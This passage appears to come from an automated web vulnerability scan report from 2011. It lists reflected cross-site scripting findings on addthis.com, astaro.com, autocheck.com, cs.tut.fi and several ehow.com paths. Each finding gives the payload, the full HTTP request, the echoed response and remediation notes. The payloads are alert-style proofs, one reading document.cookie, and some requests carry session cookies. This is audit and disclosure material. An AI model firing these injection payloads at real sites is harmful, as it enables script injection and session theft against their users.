<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/c0096"-alert(1)-"e20af2b4cfa"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be264"%20style%3dx%3aexpression(alert(1))%20a7df52ee127 was submitted in the username parameter. This input was echoed as be264\" style=x:expression(alert(1)) a7df52ee127 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bookmark.php?v=250&username=mcilusbe264"%20style%3dx%3aexpression(alert(1))%20a7df52ee127 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 15:42:53 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 94189
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="pub" name="pub" value="mcilusbe264\" style=x:expression(alert(1)) a7df52ee127" /> ...[SNIP]...
The value of the v request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 696ca"style%3d"x%3aexpression(alert(1))"f3f01901aca was submitted in the v parameter. This input was echoed as 696ca"style="x:expression(alert(1))"f3f01901aca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bookmark.php?v=250696ca"style%3d"x%3aexpression(alert(1))"f3f01901aca&username=mcilus HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 15:42:52 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 94014
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="source" name="source" value="bkm-250696ca"style="x:expression(alert(1))"f3f01901aca" /> ...[SNIP]...
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 9c4b4<script>alert(1)</script>af757eb65d0 was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter?uid=90d583b---24cb6%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E78300d896e19c4b4<script>alert(1)</script>af757eb65d0 HTTP/1.1 Host: www.astaro.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=1.1296493738.1.1.utmcsr=whitepapers.scmagazineuk.com|utmccn=(referral)|utmcmd=referral|utmcct=/astaro; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; __unam=fa38af9-12dddaf19a7-13ff2714-1; k_visit=1; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=112476180.1215039085.1296493738.1296493738.1296504424.2; __utma=1.546991621.1296493738.1296493738.1296493738.1
The value of the siteID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0cf8"%3balert(1)//cf9b759ede9 was submitted in the siteID parameter. This input was echoed as a0cf8";alert(1)//cf9b759ede9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?WT.mc_id=3499&siteID=3499a0cf8"%3balert(1)//cf9b759ede9 HTTP/1.1 Host: www.autocheck.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 15:43:06 GMT Server: Apache Set-Cookie: Apache=173.193.214.243.119221296661386602; path=/; expires=Fri, 04-Mar-11 15:43:06 GMT Cache-Control: private P3P: policyref="http://www.autocheck.com/w3c/p3p.xml", CP="NON DSP COR NID TAIa OUR NOR STA" Cache-Control: private Set-Cookie: referralCookie=cWs7WQE0rZngyYQcN3; path=/; expires=Fri, 04-Mar-2011 15:43:12 GMT Set-Cookie: JSESSIONID=cWs7WQE0rZngyYQcN3; path=/ Connection: close Content-Type: text/html Content-Length: 30580
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1 ...[SNIP]... <!-- var opt_siteId="3499a0cf8";alert(1)//cf9b759ede9"; var opt_marketing_code=""; var opt_banner_id=""; //--> ...[SNIP]...
The value of the siteID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d3c6"><script>alert(1)</script>713dc893771 was submitted in the siteID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?WT.mc_id=3499&siteID=34996d3c6"><script>alert(1)</script>713dc893771 HTTP/1.1 Host: www.autocheck.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 15:43:06 GMT Server: Apache Set-Cookie: Apache=173.193.214.243.132231296661386218; path=/; expires=Fri, 04-Mar-11 15:43:06 GMT Cache-Control: private P3P: policyref="http://www.autocheck.com/w3c/p3p.xml", CP="NON DSP COR NID TAIa OUR NOR STA" Cache-Control: private Set-Cookie: referralCookie=bIZSzpUOcIr54GQcN3; path=/; expires=Fri, 04-Mar-2011 15:43:11 GMT Set-Cookie: JSESSIONID=bIZSzpUOcIr54GQcN3; path=/ Connection: close Content-Type: text/html Content-Length: 30844
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcabd"><script>alert(1)</script>2e234cdb39e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /~jkorpeladcabd"><script>alert(1)</script>2e234cdb39e/quirks-mode.html, HTTP/1.1 Host: www.cs.tut.fi Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 04:07:33 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 1573
<p> <font size="-1" color="gray"> This server is <code>www.cs.tut.fi</code>, located at <a href="http://www ...[SNIP]... <a href="http://www.tut.fi/~jkorpeladcabd"><script>alert(1)</script>2e234cdb39e/quirks-mode.html,"> ...[SNIP]...
The value of the afterLogin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90c4e"style%3d"x%3aexpression(alert(1))"91e1a856a5b was submitted in the afterLogin parameter. This input was echoed as 90c4e"style="x:expression(alert(1))"91e1a856a5b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /account/simple_login.aspx?afterLogin=90c4e"style%3d"x%3aexpression(alert(1))"91e1a856a5b HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:15:13 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 7281
<!DOCTYPE html> <html id="www-ehow-com"> <head> <title>Sign in to your eHow Account</title> <meta name="siteid" scheme="DMINSTR2" content="EHWC" /> <meta name="pagetype" scheme="DMINSTR2 ...[SNIP]... <form action="http://www.ehow.com/account/simple_login.aspx?afterLogin=90c4e"style="x:expression(alert(1))"91e1a856a5b" method="post"> ...[SNIP]...
The value of the afterLogin request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d0d0'%3balert(1)//1fa3188652 was submitted in the afterLogin parameter. This input was echoed as 7d0d0';alert(1)//1fa3188652 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /account/simple_login.aspx?afterLogin=7d0d0'%3balert(1)//1fa3188652 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:15:14 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 7241
<!DOCTYPE html> <html id="www-ehow-com"> <head> <title>Sign in to your eHow Account</title> <meta name="siteid" scheme="DMINSTR2" content="EHWC" /> <meta name="pagetype" scheme="DMINSTR2 ...[SNIP]... ownerid : dlabs.user.id, cookie : '', session : 'axi0su55dyp0oq45zse1qr55', userid : dlabs.user.id, username : dlabs.user.name }; var afterLogin = '7d0d0';alert(1)//1fa3188652';
The value of the afterLogin request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff930'%3balert(1)//5c2172634b4 was submitted in the afterLogin parameter. This input was echoed as ff930';alert(1)//5c2172634b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /account/simple_register.aspx?afterLogin=submit_frmMailff930'%3balert(1)//5c2172634b4 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:44:59 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 22050
1.354. http://www.ehow.com/arts-and-crafts/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/arts-and-crafts/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbed2'-alert(1)-'b6ad201675f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /arts-and-crafts/?dbed2'-alert(1)-'b6ad201675f=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:23 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72069
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Arts & Crafts - How To Information | eHow.com</ti ...[SNIP]... <fb:like href="http://www.ehow.com/arts-and-crafts/?dbed2'-alert(1)-'b6ad201675f=1" ref="like" width="300"> ...[SNIP]...
1.355. http://www.ehow.com/arts-and-entertainment/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/arts-and-entertainment/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d59da'-alert(1)-'dafe2f9e7e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /arts-and-entertainment/?d59da'-alert(1)-'dafe2f9e7e8=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:22 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72268
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Arts & Entertainment - How To Information | eHow. ...[SNIP]... <fb:like href="http://www.ehow.com/arts-and-entertainment/?d59da'-alert(1)-'dafe2f9e7e8=1" ref="like" width="300"> ...[SNIP]...
1.356. http://www.ehow.com/beauty-and-personal-care/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/beauty-and-personal-care/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce2c5'-alert(1)-'b84718647fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /beauty-and-personal-care/?ce2c5'-alert(1)-'b84718647fe=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:24 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 73561
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Beauty & Personal Care - How To Information | eHo ...[SNIP]... <fb:like href="http://www.ehow.com/beauty-and-personal-care/?ce2c5'-alert(1)-'b84718647fe=1" ref="like" width="300"> ...[SNIP]...
1.357. http://www.ehow.com/business/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/business/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76bb7'-alert(1)-'d74031893f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business/?76bb7'-alert(1)-'d74031893f9=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:25 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 75314
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Business - How To Information | eHow.com</title> ...[SNIP]... <fb:like href="http://www.ehow.com/business/?76bb7'-alert(1)-'d74031893f9=1" ref="like" width="300"> ...[SNIP]...
1.358. http://www.ehow.com/car-repair-and-maintenance/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/car-repair-and-maintenance/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81bbf'-alert(1)-'0dd7b3504d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /car-repair-and-maintenance/?81bbf'-alert(1)-'0dd7b3504d5=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:22 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72997
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Car Repair & Maintenance - How To Information | e ...[SNIP]... <fb:like href="http://www.ehow.com/car-repair-and-maintenance/?81bbf'-alert(1)-'0dd7b3504d5=1" ref="like" width="300"> ...[SNIP]...
1.359. http://www.ehow.com/careers/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/careers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da1da'-alert(1)-'b38942ddcfd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/?da1da'-alert(1)-'b38942ddcfd=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:28 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 75360
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Careers - How To Information | eHow.com</title>
1.360. http://www.ehow.com/cars/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/cars/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9209d'-alert(1)-'45b907ee68f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cars/?9209d'-alert(1)-'45b907ee68f=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:23 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 70759
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Cars - How To Information | eHow.com</title> < ...[SNIP]... <fb:like href="http://www.ehow.com/cars/?9209d'-alert(1)-'45b907ee68f=1" ref="like" width="300"> ...[SNIP]...
1.361. http://www.ehow.com/computer-software/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/computer-software/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 206d4'-alert(1)-'dbefd3749fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /computer-software/?206d4'-alert(1)-'dbefd3749fe=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:24 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72900
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Computer Software - How To Information | eHow.com ...[SNIP]... <fb:like href="http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1" ref="like" width="300"> ...[SNIP]...
1.362. http://www.ehow.com/computers/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/computers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdff3'-alert(1)-'174bc4ab464 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /computers/?fdff3'-alert(1)-'174bc4ab464=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:23 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 75189
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Computers - How To Information | eHow.com</title> ...[SNIP]... <fb:like href="http://www.ehow.com/computers/?fdff3'-alert(1)-'174bc4ab464=1" ref="like" width="300"> ...[SNIP]...
1.363. http://www.ehow.com/culture-and-society/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/culture-and-society/
Issue detail
